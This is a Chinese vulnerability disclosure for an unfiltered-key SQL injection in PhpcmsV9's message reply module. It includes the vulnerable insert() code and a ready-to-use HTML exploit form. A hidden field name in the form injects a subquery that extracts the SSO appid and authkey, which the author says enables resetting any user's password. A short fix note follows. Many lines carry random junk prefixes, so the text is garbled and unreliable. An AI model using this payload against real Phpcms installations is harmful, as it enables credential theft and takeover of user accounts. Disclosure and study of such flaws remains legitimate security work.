PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

* m0 k# c5 X  G$ u/ y5 I第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

. E. _6 s8 Y5 E, g' E. ^明天再更新下一个漏洞。
详细说明：
在/phpcms9/phpcms/modules/message/index.php中有代码如下：
  ]2 I, s+ f2 e5 P5 I! u
$messageid = $this->message_db->insert($_POST['info'],true);
6 |* M: d7 m+ a$ B! i3 }6 a, M
8 t8 i, y9 }* }& k* X
insert方法是key value的，代码如下：

public function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
& Q& ^; j/ A# |0 x0 I                        return false;
3 L( s  p& X7 w8 X9 u; P                }
               
                $fielddata = array_keys($data);
                $valuedata = array_values($data);
1 i% w! ^7 O6 o7 B                array_walk($fielddata, array($this, 'add_special_char'));
9 o: d0 m+ L4 F6 {1 N* x7 |                array_walk($valuedata, array($this, 'escape_string'));
' ^5 e2 r- X& F' Y               
/ ^. m! p& Q+ h) m8 u                $field = implode (',', $fielddata);
. B! _# L* M, f- p0 Q' P                $value = implode (',', $valuedata);

                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
                return $return_insert_id ? $this->insert_id() : $return;
2 S, }! }! Q7 G        }
4 @* v3 |) }+ W# Q! _' d1 r  X4 `

嗯，很遗憾的是

/ d! @, O3 y7 W% c1 Y; ?' Rarray_walk($fielddata, array($this, 'add_special_char'));
, o7 A- p0 I9 N
2 K0 \) i6 C: Z' S# O0 J
& \6 J+ w7 v4 A1 M- `1 j! _( D中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

6 L6 [6 S# u2 N1 `1 N5 S; U4 e漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。


! }1 x7 f+ E: S, w; V! y表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
2 C; O, Y8 t" _6 N, D<tr>
7 v# G. l* T" k$ V<th>标 题：</th>
1 i) K: ^8 L6 ^  f1 A. z1 l<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
/ O/ L3 Z5 B: @5 u5 Y& N5 v<tr>
<th>内 容：</th>
# d5 d- |0 U" R<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
, X0 T2 x/ \$ Z; H7 Z</tr>
<input type="hidden" name="info[replyid]" value="2" />
! i2 c. t* K1 \' }, O  `+ e<input type="hidden" name="info[send_to_id]" value="cc" />
9 B9 n- B0 {$ a' \9 u  G3 a# h' z<input type="hidden" name="info[send_from_id]" value="hh">
' `$ Q" U0 d5 [! ]' K( T! D' q<!-- 漏洞的利用重点在这里开始 -->
2 a! X* M% I+ [6 C& u! ~6 P8 L<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
<!-- 漏洞的利用重点在这里结束 -->
0 O  N+ ~: U! [" i' f2 n, V: v, b<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
<td></td>
<td colspan="2"><label>
  M, a/ ^) v; v. j0 w' [+ X2 n7 a<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
. j! M7 d' l1 l; Q</label></td>
</tr>
3 g9 f) ]7 ~) n* X7 h8 y</table>
, K) }/ F. g+ [  v</form>
% r! A, C9 n7 y7 `在add_special_char函数内对key做过滤就可以了。